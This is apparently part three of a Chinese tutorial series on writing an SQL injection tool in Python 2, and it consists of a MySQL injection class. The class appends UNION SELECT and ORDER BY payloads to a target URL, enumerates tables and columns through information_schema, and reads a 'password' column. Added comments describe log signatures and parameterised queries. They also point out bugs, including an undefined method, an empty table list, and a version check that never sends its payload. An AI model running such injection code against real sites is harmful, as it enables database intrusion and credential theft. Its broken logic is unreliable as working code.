Python編寫SQL注入工具(3)


Mysql注入模塊

#coding:gb2312
import urllib
import string
import binascii
import re

class mysqlInject():
    """Page-diff MySQL injection probe (Python 2: print statements, urllib.urlopen, string.join).

    Every method appends a raw, URL-encoded SQL fragment to ``self.url`` and
    fetches the result, so the injectable parameter is expected to be the
    last thing in ``self.url``.  Nothing is quoted or escaped; database and
    table names are handed in as ``0x...`` hex literals by ``inject5``.

    Defender's view: the traffic this class produces is easy to recognise in
    access logs or at a WAF -- a sweep of ``order by 1..99``, then
    ``and 1=2 UNION SELECT concat(0x25,...,0x25)`` repeated per column, then
    reads from ``information_schema.columns`` with hex-literal schema/table
    names.  Parameterised queries remove the underlying flaw; the request
    shapes above are the detection signal.
    """
    def __init__(self,url):
        self.db='database()'    # SQL expression for the current schema; not read by any method below
        self.url=url  # URL under test; payloads are string-appended to it verbatim
        self.dblen=0  # database-name length; never written in this class
        self.counts=0 # column count found by columnCounts(); sets the UNION SELECT width
        self.tables=[] # table names; NOTE: no method in this class appends to it (see inject5)
        self.dbname=''  # never written in this class

    # Version check by page comparison.  NOTE: ``sql`` (the URL carrying
    # ``mid(version(),1,1)=...``) is built but never fetched -- the second
    # request reads ``self.url`` again -- so ``page`` and ``pagex`` are always
    # equal and the ">5" branch is always printed.
    def judgeVersion(self):
        page=urllib.urlopen(self.url).read()
        sql=string.join([self.url,"%20and%20mid(version(),1,1)=523%"],'')
        pagex=urllib.urlopen(self.url).read()
        if page==pagex:
            print 'MYSQL版本:>5'
        else:
            print 'MYSQL版本<5'

    # Column-count sweep via ``order by N``, N = 1..99.  The baseline page is
    # fetched once; iteration 1 only checks that ``order by 1`` leaves the
    # page unchanged (otherwise the technique is declared unusable and the
    # loop exits).  The first N whose page differs from the baseline sets
    # ``self.counts = N-1``.  The comparison is byte-exact, so any dynamic
    # page content (timestamps, rotating banners) ends the sweep early or
    # yields a wrong count.  Log-side, a burst of near-identical requests
    # differing only in the trailing number is the tell-tale pattern.
    def columnCounts(self):
        page=urllib.urlopen(self.url).read()
        for n in range(1,100):
            sql=string.join([self.url,"%20order%20by%20",str(n)],'')
            pagex=urllib.urlopen(sql).read()
            if n==1:
                if page==pagex:
                    print '可以使用 order by 猜解'
                else:
                    print '不能使用order by 猜解'
                    break
            else:
                if page!=pagex:
                    self.counts=n-1
                    print '字段數:',self.counts
                    break
        if self.counts==0:
            print '未能猜解出字段數!'

    # One UNION SELECT whose every column is ``concat(0x25,<sql>,0x25)``
    # (0x25 is the ``%`` delimiter the regex below looks for); the value is
    # then pulled back out of the page as a ``%...%`` run.  ``sql`` is
    # inserted unencoded and unescaped.  Returns the SECOND ``%...%`` match
    # with its delimiters stripped, or None (implicitly) when the regex finds
    # nothing; raises IndexError when exactly one run is found.  Why the first
    # match is skipped is not visible here -- presumably a ``%`` run that
    # occurs naturally on the target page; verify against the target.
    def inject5Content(self,sql):
        url=self.url+'%20and%201=2%20UNION%20SELECT%20'
        for x in range(1,self.counts+1):
            if x!=1:
                url+=','
            url+='concat(0x25,'
            url+=sql
            url+=',0x25)'
        pagec=urllib.urlopen(url).read()
        reg="%[a-z,0-9,A-Z,.,\-,\\,@,:]*%"   # non-raw string: "\\," reaches re as "\," (escaped comma)
        regob = re.compile(reg, re.DOTALL)
        result = regob.findall(pagec)
        if len(result)!=0:
            strings=result[1]
            strings=strings[1:len(strings)-1]
            return strings

    # Table enumeration: the same UNION scaffold with
    # ``group_concat(distinct table_name)`` in every column, restricted to
    # ``table_schema=<DB>``.  ``DB`` is appended verbatim; ``inject5`` passes
    # a ``0x..`` hex literal so no quote characters appear in the URL (which
    # is also why the query string reads ``table_schema=0x...`` in server
    # logs).  The ``+`` in ``distinct+table_name`` is a URL-encoded space.
    # Returns the comma-split second ``%...%`` match, None when there is no
    # match, IndexError when there is only one.  The list is returned, not
    # stored in ``self.tables``.
    def inject5TableNames(self,DB):
        url=self.url+'%20and%201=2%20UNION%20SELECT%20'
        for x in range(1,self.counts+1):
            if x!=1:
                url+=','
            url+='concat(0x25,'
            url+='group_concat(distinct+table_name)'
            url+=',0x25)'
        url+='%20from%20information_schema.columns%20where%20table_schema='
        url+=DB
        pagec=urllib.urlopen(url).read()
        reg="%[a-z,0-9,A-Z,.,\,,\-,\\,@,:]*%"   # comma kept in the class so group_concat lists come through whole
        regob = re.compile(reg, re.DOTALL)
        result = regob.findall(pagec)
        if len(result)!=0:
            strings=result[1]
            strings=strings[1:len(strings)-1]
            s=strings.split(',')
            return s

    # Column enumeration for one table: identical to inject5TableNames except
    # it selects ``group_concat(distinct column_name)`` and filters on
    # ``table_name=<TB>`` (again a verbatim, unquoted value -- ``inject5``
    # supplies a hex literal).  Same return contract: list of names, None on
    # no match, IndexError on a single match.
    def inject5ColumnsName(self,TB):
        url=self.url+'%20and%201=2%20UNION%20SELECT%20'
        for x in range(1,self.counts+1):
            if x!=1:
                url+=','
            url+='concat(0x25,'
            url+='group_concat(distinct+column_name)'
            url+=',0x25)'
        url+='%20from%20information_schema.columns%20where%20table_name='
        url+=TB
        pagec=urllib.urlopen(url).read()
        reg="%[a-z,0-9,A-Z,.,\,,\-,\\,@,:]*%"
        regob = re.compile(reg, re.DOTALL)
        result = regob.findall(pagec)
        if len(result)!=0:
            strings=result[1]
            strings=strings[1:len(strings)-1]
            s=strings.split(',')
            return s

    # Reads column ``CN`` from table ``TN`` through the same UNION scaffold
    # (``from <TN>`` appended verbatim, no quoting) and prints
    # ``CN : <value>``.  Unlike the two enumeration methods above it returns
    # nothing; only the second ``%...%`` regex match is used, with the same
    # IndexError exposure when a single run is found.
    def inject5CountContent(self,TN,CN):
        url=self.url+'%20and%201=2%20UNION%20SELECT%20'
        for x in range(1,self.counts+1):
            if x!=1:
                url+=','
            url+='concat(0x25,'
            url+=CN
            url+=',0x25)'
        url+='%20from%20'
        url+=TN
        pagex=urllib.urlopen(url).read()
        reg="%[a-z,0-9,A-Z,.,\,,\-,\\,@,:]*%"
        regob = re.compile(reg, re.DOTALL)
        result = regob.findall(pagex)
        if len(result)!=0:
            strings=result[1]
            strings=strings[1:len(strings)-1]
            print  CN,':',strings

    # If the database version is above 4, the information_schema
    # ("table lookup") method can be used.  Driver flow: current database
    # name -> hex literal -> table list -> first table -> hex literal ->
    # column list -> one hard-coded table/column read.  ``self.database`` is
    # created here, not in ``__init__``.  Several steps cannot complete as
    # written:
    #   * if ``inject5Content`` returned None (no regex match),
    #     ``binascii.b2a_hex`` raises TypeError;
    #   * ``self.inject5TableName`` (singular) is not defined in this class;
    #     unless another module adds it, the call raises AttributeError;
    #   * the list returned by ``inject5TableNames`` is discarded and
    #     ``self.tables`` is never populated, so ``self.tables[0]`` raises
    #     IndexError.
    # The final call uses hard-coded table/column names ('gly', 'password')
    # rather than anything discovered above.
    def inject5(self):
        d='database()'
        self.database=self.inject5Content(d)
        print self.database
        database0x=binascii.b2a_hex(self.database)   # MySQL accepts the name as a 0x hex literal, avoiding quotes in the URL
        database0x='0x'+database0x
        print database0x
        self.inject5TableName(database0x)
        self.inject5TableNames(database0x)
        tb=self.tables[0]
        print ''
        tb=binascii.b2a_hex(tb)
        tb='0x'+tb
        print tb
        self.inject5ColumnsName(tb)
        self.inject5CountContent('gly','password')

 

